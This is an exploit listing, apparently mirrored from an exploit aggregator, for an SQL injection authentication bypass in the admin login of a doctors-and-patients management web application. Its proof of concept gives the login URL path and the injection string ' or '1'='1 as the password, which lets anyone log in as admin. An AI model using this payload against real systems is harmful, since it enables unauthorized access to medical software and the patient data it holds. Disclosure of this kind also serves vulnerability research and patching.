Exploit for Doctors Patients Management System 1.0 SQL Injection

Name: Exploit for Doctors Patients Management System 1.0 SQL Injection
Rating: 5 (77 reviews)

2021-06-30 | CVSS 0.3

## https://sploitus.com/exploit?id=PACKETSTORM:163316
# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)  
# Date: 06/30/2021  
# Exploit Author: Murat DEMIRCI (butterflyhunt3r)  
# Vendor Homepage: https://www.codester.com/  
# Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system  
# Version: 1.0  
# Tested on: Windows 10  
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.  
  
# Proof of Concept :  
http://test.com/PATH/signin  
  
# Username : anything  
# Password : ' or '1'='1